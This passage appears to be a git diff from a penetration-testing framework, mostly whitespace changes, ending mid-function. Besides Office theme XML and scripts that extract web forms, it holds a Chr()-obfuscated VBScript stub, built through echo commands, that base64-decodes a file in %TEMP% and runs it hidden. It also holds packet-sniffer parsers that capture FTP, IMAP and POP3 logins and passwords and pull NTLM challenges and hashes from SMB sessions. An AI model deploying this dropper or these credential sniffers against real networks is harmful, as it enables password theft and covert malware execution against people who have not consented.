</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="40000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="40000">
<a:schemeClr val="phClr">
<a:tint val="45000"/>
<a:shade val="99000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="20000"/>
<a:satMod val="255000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
</a:path>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="80000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="30000"/>
<a:satMod val="200000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
</a:path>
</a:gradFill>
</a:bgFillStyleLst>
</a:fmtScheme>
</a:themeElements>
<a:objectDefaults/>
<a:extraClrSchemeLst/>
</a:theme>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:optimizeForBrowser/>
</w:webSettings>

View File

@ -15,8 +15,8 @@ require 'open-uri'
require 'timeout'
def usage
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
end
input = ARGV.shift() || usage()
@ -25,32 +25,32 @@ res = ""
doc = Hpricot(File.open(input))
doc.search("//form").each do |form|
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Strip out the value
form.search("//input") do |inp|
# Strip out the value
form.search("//input") do |inp|
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
end
end
res << inp.to_html
end
res << "</form>"
res << inp.to_html
end
res << "</form>"
end
$stdout.puts res

View File

@ -15,72 +15,72 @@ require 'open-uri'
require 'timeout'
def usage
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
end
sitelist = ARGV.shift() || usage()
output = ARGV.shift() || usage()
File.readlines(sitelist).each do |site|
site.strip!
next if site.length == 0
next if site =~ /^#/
out = File.join(output, site + ".txt")
File.unlink(out) if File.exists?(out)
fd = File.open(out, "a")
site.strip!
next if site.length == 0
next if site =~ /^#/
out = File.join(output, site + ".txt")
File.unlink(out) if File.exists?(out)
fd = File.open(out, "a")
["", "www."].each do |prefix|
begin
Timeout.timeout(10) do
doc = Hpricot(open("http://#{prefix}#{site}/"))
doc.search("//form").each do |form|
["", "www."].each do |prefix|
begin
Timeout.timeout(10) do
doc = Hpricot(open("http://#{prefix}#{site}/"))
doc.search("//form").each do |form|
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Strip out the value
form.search("//input") do |inp|
# Strip out the value
form.search("//input") do |inp|
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
end
end
res << inp.to_html
end
res << "</form>"
res << inp.to_html
end
res << "</form>"
fd.write(res)
end
end
break
rescue ::Timeout::Error
$stderr.puts "#{prefix}#{site} timed out"
rescue ::Interrupt
raise $!
rescue ::Exception => e
$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
end
end
fd.close
File.unlink(out) if (File.size(out) == 0)
fd.write(res)
end
end
break
rescue ::Timeout::Error
$stderr.puts "#{prefix}#{site} timed out"
rescue ::Interrupt
raise $!
rescue ::Exception => e
$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
end
end
fd.close
File.unlink(out) if (File.size(out) == 0)
end

View File

@ -0,0 +1,49 @@
echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
echo tempString = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
echo Set wshShell = CreateObject(scriptShell) >>decode_stub
echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
echo Set fs = CreateObject(scriptingFS) >>decode_stub
echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
echo If file.Size Then >>decode_stub
echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
echo data = fd.ReadAll >>decode_stub
echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
echo data = Replace(data, vbCrLf, nil) >>decode_stub
echo data = base64_decode(data) >>decode_stub
echo fd.Close >>decode_stub
echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
echo ofs.Write data >>decode_stub
echo ofs.close >>decode_stub
echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
echo Else >>decode_stub
echo Wscript.Echo emptyString >>decode_stub
echo End If >>decode_stub
echo Function base64_decode(byVal strIn) >>decode_stub
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
echo If Not w2 Then _ >>decode_stub
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
echo If Not w3 Then _ >>decode_stub
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
echo If Not w4 Then _ >>decode_stub
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
echo Next >>decode_stub
echo base64_decode = strOut >>decode_stub
echo End Function >>decode_stub
echo Function mimedecode(byVal strIn) >>decode_stub
echo If Len(strIn) = 0 Then >>decode_stub
echo mimedecode = -1 : Exit Function >>decode_stub
echo Else >>decode_stub
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
echo End If >>decode_stub
echo End Function >>decode_stub

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -8,71 +8,71 @@
class SnifferFTP < BaseProtocolParser
def register_sigs
self.sigs = {
:banner => /^(220\s*[^\r\n]+)/i,
:user => /^USER\s+([^\s]+)/i,
:pass => /^PASS\s+([^\s]+)/i,
:login_pass => /^(230\s*[^\n]+)/i,
:login_fail => /^(5\d\d\s*[^\n]+)/i,
:bye => /^221/
}
end
def register_sigs
self.sigs = {
:banner => /^(220\s*[^\r\n]+)/i,
:user => /^USER\s+([^\s]+)/i,
:pass => /^PASS\s+([^\s]+)/i,
:login_pass => /^(230\s*[^\n]+)/i,
:login_fail => /^(5\d\d\s*[^\n]+)/i,
:bye => /^221/
}
end
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "ftp"
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "ftp"
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
case matched
case matched
when :login_fail
if(s[:user] and s[:pass])
report_auth_info(s.merge({:active => false}))
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
when :login_fail
if(s[:user] and s[:pass])
report_auth_info(s.merge({:active => false}))
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
s[:pass] = ""
return
end
s[:pass] = ""
return
end
when :login_pass
if(s[:user] and s[:pass])
report_auth_info(s)
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
# Remove it form the session objects so freeup memory
sessions.delete(s[:session])
return
end
when :login_pass
if(s[:user] and s[:pass])
report_auth_info(s)
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
# Remove it form the session objects so freeup memory
sessions.delete(s[:session])
return
end
when :banner
# Because some ftp server send multiple banner we take only the first one and ignore the rest
if not (s[:info])
s[:info] = matches
report_service(s)
end
when :banner
# Because some ftp server send multiple banner we take only the first one and ignore the rest
if not (s[:info])
s[:info] = matches
report_service(s)
end
when :bye
sessions.delete(s[:session])
when :bye
sessions.delete(s[:session])
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end # end of each_key
end # end of parse
end

View File

@ -9,72 +9,72 @@
class SnifferIMAP < BaseProtocolParser
def register_sigs
self.sigs = {
:banner => /^(\*\s+OK[^\n\r]*)/i,
:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
}
end
def register_sigs
self.sigs = {
:banner => /^(\*\s+OK[^\n\r]*)/i,
:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
}
end
def parse(pkt)
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "imap4"
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "imap4"
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if (pkt.payload =~ self.sigs[k])
matched = k
matches = [$1,$2]
end
if (pkt.payload =~ self.sigs[k])
matched = k
matches = [$1,$2]
end
case matched
when :banner
s[:info] = matches
report_service(s)
case matched
when :banner
s[:info] = matches
report_service(s)
when :login_pass
when :login_pass
report_auth_info(s)
print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
report_auth_info(s)
print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :login_fail
when :login_fail
report_auth_info(s.merge({:active => false}))
print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
report_auth_info(s.merge({:active => false}))
print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :login_bad
report_auth_info(s.merge({:active => false}))
print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
when :login_bad
report_auth_info(s.merge({:active => false}))
print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :login
s[:user]=$1
s[:pass]=$2
when :login
s[:user]=$1
s[:pass]=$2
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end

View File

@ -6,83 +6,83 @@
# as unsuccessful logins... (Typos are common :-) )
#
class SnifferPOP3 < BaseProtocolParser
def register_sigs
self.sigs = {
:ok => /^(\+OK[^\n]*)\n/i,
:err => /^(\-ERR[^\n]*)\n/i,
:user => /^USER\s+([^\n]+)\n/i,
:pass => /^PASS\s+([^\n]+)\n/i,
:quit => /^(QUIT\s*[^\n]*)\n/i
}
end
def register_sigs
self.sigs = {
:ok => /^(\+OK[^\n]*)\n/i,
:err => /^(\-ERR[^\n]*)\n/i,
:user => /^USER\s+([^\n]+)\n/i,
:pass => /^PASS\s+([^\n]+)\n/i,
:quit => /^(QUIT\s*[^\n]*)\n/i
}
end
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
case matched
when :ok
# Last command was successful, in addition most servers transmit a banner with the first +OK
case s[:last]
when nil
# Its the first +OK must include the banner, worst case its just +OK
s[:info] = matches
s[:proto] = "tcp"
s[:name] = "pop3"
report_service(s)
case matched
when :ok
# Last command was successful, in addition most servers transmit a banner with the first +OK
case s[:last]
when nil
# Its the first +OK must include the banner, worst case its just +OK
s[:info] = matches
s[:proto] = "tcp"
s[:name] = "pop3"
report_service(s)
when :user
# When the last command was a username login
# We might keep track on this one in future
when :pass
# Perfect we get an +OK after a PASS command this means right password given :-)
when :user
# When the last command was a username login
# We might keep track on this one in future
when :pass
# Perfect we get an +OK after a PASS command this means right password given :-)
s[:proto] = "tcp"
s[:name] = "pop3"
s[:extra] = "Successful Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
s[:proto] = "tcp"
s[:name] = "pop3"
s[:extra] = "Successful Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :quit
# The session is terminated by the user just delete is as well
sessions.delete(s[:session])
end
s[:last]=:ok
when :quit
# The session is terminated by the user just delete is as well
sessions.delete(s[:session])
end
s[:last]=:ok
when :err
case s[:last]
when :pass
# Oops got a -ERR after a pass so its crap ignore the pass
# But report it, might be helpfull for guessing :-)
when :err
case s[:last]
when :pass
# Oops got a -ERR after a pass so its crap ignore the pass
# But report it, might be helpfull for guessing :-)
s[:proto]="pop3"
s[:extra]="Failed Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
s[:pass]=""
end
when nil
# No matches, no saved state
else
s[:last]=matched
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
s[:proto]="pop3"
s[:extra]="Failed Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
s[:pass]=""
end
when nil
# No matches, no saved state
else
s[:last]=matched
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end

View File

@ -6,206 +6,206 @@
#Memo :
#FOR SMBV1
# Authentification without extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17
#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
# Authentification without extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17
#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
# Authentification with extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
# Authentification with extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
#FOR SMBV2
#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response
#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response
class SnifferSMB < BaseProtocolParser
def register_sigs
self.sigs = {
:smb1_negotiate => /\xffSMB\x72/n,
:smb1_setupandx => /\xffSMB\x73/n,
#:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n,
:smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n
}
end
def register_sigs
self.sigs = {
:smb1_negotiate => /\xffSMB\x72/n,
:smb1_setupandx => /\xffSMB\x73/n,
#:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n,
:smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n
}
end
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
case matched
when :smb1_negotiate
payload = pkt.payload.dup
wordcount = payload[36,1].unpack("C")[0]
#negotiate response
if wordcount == 17
flags2 = payload[14,2].unpack("v")[0]
#the server challenge is here
if flags2 & 0x800 == 0
s[:challenge] = payload[73,8].unpack("H*")[0]
s[:last] = :smb1_negotiate
end
end
case matched
when :smb1_negotiate
payload = pkt.payload.dup
wordcount = payload[36,1].unpack("C")[0]
#negotiate response
if wordcount == 17
flags2 = payload[14,2].unpack("v")[0]
#the server challenge is here
if flags2 & 0x800 == 0
s[:challenge] = payload[73,8].unpack("H*")[0]
s[:last] = :smb1_negotiate
end
end
when :smb1_setupandx
s[:smb_version] = "SMBv1"
parse_sessionsetup(pkt, s)
when :smb2_setupandx
s[:smb_version] = "SMBv2"
parse_sessionsetup(pkt, s)
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
when :smb1_setupandx
s[:smb_version] = "SMBv1"
parse_sessionsetup(pkt, s)
when :smb2_setupandx
s[:smb_version] = "SMBv2"
parse_sessionsetup(pkt, s)
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end # end of each_key
end # end of parse
#ntlmv1, ntlmv2 or ntlm2_session
def detect_ntlm_ver(lmhash, ntlmhash)
return "NTLMv2" if ntlmhash.length > 48
if lmhash.length == 48 and ntlmhash.length == 48
if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
return "NTLM2_SESSION"
else
return "NTLMv1"
end
else
raise RuntimeError, "Unknow hash type"
end
end
#ntlmv1, ntlmv2 or ntlm2_session
def detect_ntlm_ver(lmhash, ntlmhash)
return "NTLMv2" if ntlmhash.length > 48
if lmhash.length == 48 and ntlmhash.length == 48
if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
return "NTLM2_SESSION"
else
return "NTLMv1"
end
else
raise RuntimeError, "Unknow hash type"
end
end
def parse_sessionsetup(pkt, s)
payload = pkt.payload.dup
ntlmpayload = payload[/NTLMSSP\x00.*/m]
if ntlmpayload
ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
case ntlmmessagetype
when 2 # challenge
s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
s[:last] = :ntlm_type2
when 3 # auth
if s[:last] == :ntlm_type2
lmlength = ntlmpayload[12, 2].unpack("v")[0]
lmoffset = ntlmpayload[16, 2].unpack("v")[0]
ntlmlength = ntlmpayload[20, 2].unpack("v")[0]
ntlmoffset = ntlmpayload[24, 2].unpack("v")[0]
domainlength = ntlmpayload[28, 2].unpack("v")[0]
domainoffset = ntlmpayload[32, 2].unpack("v")[0]
usrlength = ntlmpayload[36, 2].unpack("v")[0]
usroffset = ntlmpayload[40, 2].unpack("v")[0]
def parse_sessionsetup(pkt, s)
payload = pkt.payload.dup
ntlmpayload = payload[/NTLMSSP\x00.*/m]
if ntlmpayload
ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
case ntlmmessagetype
when 2 # challenge
s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
s[:last] = :ntlm_type2
when 3 # auth
if s[:last] == :ntlm_type2
lmlength = ntlmpayload[12, 2].unpack("v")[0]
lmoffset = ntlmpayload[16, 2].unpack("v")[0]
ntlmlength = ntlmpayload[20, 2].unpack("v")[0]
ntlmoffset = ntlmpayload[24, 2].unpack("v")[0]
domainlength = ntlmpayload[28, 2].unpack("v")[0]
domainoffset = ntlmpayload[32, 2].unpack("v")[0]
usrlength = ntlmpayload[36, 2].unpack("v")[0]
usroffset = ntlmpayload[40, 2].unpack("v")[0]
s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
secbloblength = payload[51,2].unpack("v")[0]
names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:peer_os] = names[0] || ''
s[:peer_lm] = names[1] || ''
s[:last] = :ntlm_type3
end
end
else
wordcount = payload[36,1].unpack("C")[0]
#authentification without smb extended security (smbmount, msf server capture)
if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1"
lmlength = payload[51,2].unpack("v")[0]
ntlmlength = payload[53,2].unpack("v")[0]
s[:lmhash] = payload[65,lmlength].unpack("H*")[0]
s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0]
names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
secbloblength = payload[51,2].unpack("v")[0]
names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:peer_os] = names[0] || ''
s[:peer_lm] = names[1] || ''
s[:last] = :ntlm_type3
end
end
else
wordcount = payload[36,1].unpack("C")[0]
#authentification without smb extended security (smbmount, msf server capture)
if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1"
lmlength = payload[51,2].unpack("v")[0]
ntlmlength = payload[53,2].unpack("v")[0]
s[:lmhash] = payload[65,lmlength].unpack("H*")[0]
s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0]
names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:user] = names[0]
s[:domain] = names[1]
s[:peer_os] = names[2]
s[:peer_lm] = names[3]
s[:last] = :smb_no_ntlm
else
#answer from server
if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
#do not output anonymous/guest logging
unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
#set lmhash to a default value if not provided
s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
s[:user] = names[0]
s[:domain] = names[1]
s[:peer_os] = names[2]
s[:peer_lm] = names[3]
s[:last] = :smb_no_ntlm
else
#answer from server
if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
#do not output anonymous/guest logging
unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
#set lmhash to a default value if not provided
s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
